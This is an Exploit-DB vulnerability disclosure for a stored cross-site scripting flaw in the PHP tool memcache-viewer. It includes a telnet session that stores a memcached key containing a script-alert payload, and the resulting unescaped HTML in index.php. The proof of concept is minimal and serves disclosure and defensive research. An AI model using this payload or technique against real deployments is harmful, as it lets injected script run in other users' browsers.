memcache-viewer - Cross-Site Scripting

EDB-ID:

41455

CVE:

N/A


Author:

HaHwul

Type:

webapps


Platform:

PHP

Date:

2017-02-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: memcache-viewer - Stored XSS
# Date: 2017-02-24
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]

### Vulnerability 
This program does not filter filtering on the special character when expressing the data from memcached on the web.
When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.

### Example Attack code
1. Send Payload(XSS Code) after Connecting to memcached server.
#> telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

add hacked<script>alert(45)</script> 0 900 2
45
STORED

2. Insert data through memcached related 3rd party application.

### Result
Access index.php after memcache-viewer login
DOM Area in index.php
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>